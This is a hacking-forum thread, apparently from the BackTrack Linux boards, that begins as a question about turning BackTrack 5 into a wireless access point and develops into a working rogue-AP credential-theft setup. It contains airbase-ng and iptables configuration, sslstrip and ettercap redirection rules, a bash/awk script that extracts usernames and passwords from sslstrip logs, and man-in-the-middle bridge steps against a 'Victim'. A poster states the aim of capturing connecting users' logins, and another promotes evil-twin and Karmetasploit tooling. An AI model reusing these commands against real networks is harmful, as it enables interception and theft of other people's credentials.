Page 1 of 2 12 LastLast
Results 1 to 10 of 11

Thread: Make backtrack as an AP

  1. #1
    Just burned his ISO
    Join Date
    Apr 2011
    Location
    Norway
    Posts
    13

    Default Make backtrack as an AP

    I would like to know how I could make Backtrack act as an access point for wireless connections and cable.

    Scenario:
    I am connected to a wireless network with the computer with BT5. I want to share that network with other computers without or with wireless nic. In my usage it will be both.

    I have tried to setup an AP with Gerix Wifi cracker but those a fake APs that don't work properly.

    And if this can be done can I add filters that will not allow facebook to be accessed and maybe bandwith limiter etc?

    Help appriciated

  2. #2
    Just burned his ISO
    Join Date
    Apr 2011
    Location
    Norway
    Posts
    13

    Default Re: Make backtrack as an AP

    I have been trying making an AP using Hostapd but I can't seem to get my NIC's into Master Mode. I have an ALFA AWUS036H and an Atheros AR2425.
    The Atheros use ath5k.
    The Alfa use rtl8187.

    Does anyone know if ALFA can be set in master mode? Ive read that it is not supported yet.
    Is it good or possible to use MadWiFi to make an AP?

  3. #3
    Junior Member M00kaw's Avatar
    Join Date
    Oct 2010
    Location
    127.0.0.1
    Posts
    47

    Default Re: Make backtrack as an AP

    I've played around with for a little, and this is what I came up with:
    Setting up a WiFi AP in BackTrack Linux 5

    # I'm using two wireless interfaces:
    # Interface Chipset Driver
    #
    # wlan0 Broadcom b43 - [phy0]
    # wlan1 Ralink RT2870/3070 rt2800usb - [phy1]
    #
    # I'm connected to a wireless network with wlan0
    # My wlan1 is used to create the AP (an Alfa wireless USB dongle)
    #
    #install dhcp-server
    apt-get install dhcp3-server

    #backup the std. configuration-file
    mv /etc/dhcp3/dhcp.conf /etc/dhcp3/dhcp3.conf.backup

    #create a new dhcp-conf with class C IP and /25 subnet
    nano /etc/dhcp3/dhcp.conf

    #insert the following:
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 192.168.2.128 netmask 255.255.255.128 {
    option subnet-mask 255.255.255.128;
    option broadcast-address 192.168.2.255;
    option routers 192.168.2.129;
    option domain-name-servers 8.8.8.8;
    range 192.168.2.130 192.168.2.140;
    }
    #the dhcp.conf ends here


    #fire up the accesspoint
    #create monitor-mode mon0
    airmon-ng start wlan1
    airbase-ng -e "AP_NAME" -c 9 mon0
    # -e for name, -c for channel, on the monitor mon0

    #this will create a virtuel interface called at0
    #configuring at0 with the dhcp.conf

    ifconfig at0 up
    ifconfig at0 192.168.2.129 netmask 255.255.255.128

    #add a route for the traffic
    route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
    #192.168.2.128 == the netmask
    #255.255.255.128 == the subnet which is /25
    #192.168.2.129 == the gatway aka first avaible IP address on the network

    #now point the new dhcp.conf to the dhcp3-server

    dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0

    # run the following commands to flush all ip-tables and setup new ones

    iptables --flush && iptables --table nat --flush && iptables --delete-chain && iptables --table nat --delete-chain &&
    iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE &&
    iptables --append FORWARD --in-interface at0 -j ACCEPT &&
    echo 1 > /proc/sys/net/ipv4/ip_forward

    #I wrote it this way, so that it's easy to put into a bash-script
    #WiFi AP is now setup and should work..


    # Links:
    # http://www.howtoforge.com/nat_iptables
    # http://adaywithtape.blogspot.com/200...irbase-ng.html

  4. #4
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    7

    Default Re: Make backtrack as an AP

    I've used this setup and the users who connect to the AP can access the internet and I can watch what's happening on Wireshark.

    I'm trying to get the logins and passwords used so I searched google and came across a very similar setup in addition to using:

    Code:
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    &
    Code:
    ettercap -T -q -p -i at0 // //
    sslstrip -a -k -f
    the problem is when I add those commands to my setup the users lose connectivity to the internet.

    I also removed the # from the etter.conf so it looks like this:
    Code:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
       redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    Any idea what the problem is? Again I'm using the same setup M00kaw showed in his post.
    Last edited by masry; 07-11-2011 at 08:53 PM.

  5. #5
    Junior Member M00kaw's Avatar
    Join Date
    Oct 2010
    Location
    127.0.0.1
    Posts
    47

    Default Re: Make backtrack as an AP

    Actually - I had the same exact issue with ettercap ... Piece of s*** wont work :-P

    So, what I did was to save the sslstrip.log and search it for username/passwords ...
    This was done by a part of the script that ComaX made for sniffing traffic..

    It could look something like this (again, all credit goes to comaX):

    #!/bin/bash
    echo "Do you want to save passwords to a file? (Y=keep)"
    echo "(If you want to keep it, it will be saved in /root/filename.pass.txt)"
    read -e keeppd
    if [[ $keeppd = "Y" || $keeppd = "y" ]] ; then # double brackets because double condition. || signifies "or"
    cat /root/sslstrip.log |
    awk -F "&" '!/GET/ && !/if/ !/header/ && !/^[0-9]/ && !/</ && /[PpEeUuLlCc_][A-Za-z]*=[A-Za-z0-9.%_-]*/ {if (NF >= 2) print $0}' |
    awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
    egrep -a -i "pwd=|pass=|passwd=|password=|textbox=|email=|user =|username=|login=|credential=|_user|_pwd=|email_a ddress=" |
    awk -F "=" '{if (length($2) < 3) print "\b"; else if ($1 ~/[Pp]/) print "Password = " $2"\n"; else print "Login =", $2}' >& /root/filename.pass.txt #we do it all over again... There should be a way not to re-do that...
    if [ -f "/root/filename.pass.txt" ]; then #check if it exists
    echo "Passwords saved !" #it does
    else echo "Error while saving passwords" #it does not
    fi
    else echo "Password saving skipped."
    fi
    rm /root/filename.txt
    echo -e "\nTemporary files deleted."

  6. #6
    Very good friend of the forum hhmatt's Avatar
    Join Date
    Jan 2010
    Posts
    660

    Default Re: Make backtrack as an AP

    Quote Originally Posted by masry View Post
    I also removed the # from the etter.conf so it looks like this:
    Code:
       redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    You need to recomment redir_command_off.
    You may also want to flush your iptables and you can then reenter the command manually.

  7. #7
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    7

    Default Re: Make backtrack as an AP

    @ M00kaw, I haven't tried the script yet. I'm trying to figure out how this whole thing works before I use scripts. But if I can't get this setup to work I might just use the script.

    @ hhmatt, I've tried re-commenting redir_command_off so now it looks like this
    Code:
    #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    and also edited part in etter.conf based on a recommendation by someone (google search) so now it looks like this:
    Code:
    ec_uid = 0
    ec_gid = 0
    unfortunately the user of the AP loses connectivity after I insert
    Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    I even disconnected my test subjects (laptop & ipad) from the AP and reconnected again, but still couldn't connect to the internet again.

    Here is a summary of my setup:

    dhcpd.conf
    Code:
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 192.168.2.128 netmask 255.255.255.128 {
    option subnet-mask 255.255.255.128;
    option broadcast-address 192.168.2.255;
    option routers 192.168.2.129;
    option domain-name-servers 8.8.8.8;
    range 192.168.2.130 192.168.2.140;
    }
    Code:
    root@bt:~# airmon-ng start wlan1
    root@bt:~# airbase-ng -e "wifi" -c 9 mon0
    
    
    10:58:27  Created tap interface at0
    10:58:27  Trying to set MTU on at0 to 1500
    10:58:27  Trying to set MTU on mon0 to 1800
    10:58:27  Access Point with BSSID 00:A0:AA:AA:AA:5A started.[/QUOTE]
    
    root@bt:~# ifconfig at0 up
    root@bt:~# ifconfig at0 192.168.2.129 netmask 255.255.255.128
    root@bt:~# route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
    root@bt:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
    
    Internet Systems Consortium DHCP Server V3.1.3
    Copyright 2004-2009 Internet Systems Consortium.
    All rights reserved.
    For info, please visit https://www.isc.org/software/dhcp/
    Wrote 2 leases to leases file.
    Listening on LPF/at0/00:A0:AA:AA:AA:5A/192.168.2.128/25
    Sending on   LPF/at0/00:A0:AA:AA:AA:5A/192.168.2.128/25
    Sending on   Socket/fallback/fallback-net
    
    root@bt:~# iptables --flush && iptables --table nat --flush && iptables --delete-chain && 
    iptables --table nat --delete-chain && 
    iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE && 
    iptables --append FORWARD --in-interface at0 -j ACCEPT && echo 1 > /proc/sys/net/ipv4/ip_forward
    After the last command I can have my test subjects connect to the AP and have internet connectivity.

    Based on what I found on google I need to add two more lines to get etter and sslstrip working with this setup.

    I entered each command separately so I can know which one breaks the connection. First I insert
    Code:
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
    (The 192.168.1.1 is my home gateway)

    After inserting this command my ipad and laptop can browse the internet. Until
    Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    which kills the AP's internet. I searched google and compared the command I'm using and it matches other codes so I don't think it's a typo in the command or something. h'mm any more ideas I can try with this setup?

    Thanks

  8. #8
    Member shadowzero's Avatar
    Join Date
    Jun 2011
    Location
    ${HOME}
    Posts
    94

    Default Re: Make backtrack as an AP

    Quote Originally Posted by masry View Post
    After inserting this command my ipad and laptop can browse the internet. Until
    Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    which kills the AP's internet. I searched google and compared the command I'm using and it matches other codes so I don't think it's a typo in the command or something. h'mm any more ideas I can try with this setup?
    After you insert this command, you should run sslstrip. sslstrip listens on port 10000 by default. Since you are now redirecting connections to port 80 to port 10000, if nothing is listening on port 10000 then your wireless clients won't be able to get anywhere.

  9. #9
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    7

    Default Re: Make backtrack as an AP

    @ shadowzero, thanks very much for the tip. That fixed the issue and now I got the AP and sslstrip playing nice together.
    @ M00kaw and hhmatt thank you for your support.

    Since I was having problems with this setup I searched for another way to create an AP with airbase-ng and came across a tutorial on securitytube (Wireless Lan Security Megaprimer Part 12: Man-In-The-Middle Attack) which uses a different method and also uses burp suite which looks pretty cool.

    I tried to get it work on BT5 gnome 32bit and I'm running into an error:

    can't add wlan0 to bridge mitm: Operation not supported
    here is my setup:
    |Router| ---wlan0---- |backtrack| -------wlan1(mon0)--------|Victim|

    Steps I've taken:

    I connect to the internet through using my built-in wireless card (wlan0) and my alfa awus036h card is wlan1

    Code:
    root@bt:-# ifconfig wlan1 up 
    root@bt:-# airmon-ng start wlan1 
    root@bt:-# iwconfig wlan1 channel 1 
    root@bt:-# iwconfig mon0 channel 1 
    root@bt:-# airbase-ng --essid test mon0 
    root@bt:-# ifconfig at0 up 
    root@bt:-# brctl addbr mitm 
    root@bt:-# brctl addif mitm at0 
    root@bt:-# brctl addif mitm wlan0
    And again when I run that last command I get the error message. Did anyone try this kind of setup and got it to work on installed bt not vm machine?

    I don't want to open another thread since this one got the right title and also would have two methods of creating an AP on backtrack if I get it to work properly.

    Thanks,

  10. #10
    Senior Member
    Join Date
    Dec 2010
    Posts
    127

    Default Re: Make backtrack as an AP

    Check out my script easy-creds. I just posted v3.5 for BT5 on Sourceforge

    http://sourceforge.net/projects/easy-creds/

    It has a regular FakeAP, a FakeAP Eviltwin & a Karmetasploit attack.

    I have the same Alfa card as you so I know it'll work.

    Happy Hunting!

    JB

Page 1 of 2 12 LastLast

Similar Threads

  1. Do tools here ever make it into Backtrack?
    By Sys7emR00t in forum Tool Requests
    Replies: 16
    Last Post: 02-24-2011, 05:55 AM
  2. how do you make a backtrack 3 live CD/DVD
    By gamerkid in forum OLD Newbie Area
    Replies: 0
    Last Post: 07-21-2009, 06:08 PM
  3. Replies: 2
    Last Post: 04-09-2009, 08:16 PM
  4. Make repositories for backtrack?
    By asil-jinn in forum OLD Feature requests
    Replies: 2
    Last Post: 09-08-2007, 12:09 PM
  5. Need Help can't make BackTrack bootable CD
    By zagor00 in forum OLD Newbie Area
    Replies: 4
    Last Post: 08-08-2007, 08:56 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •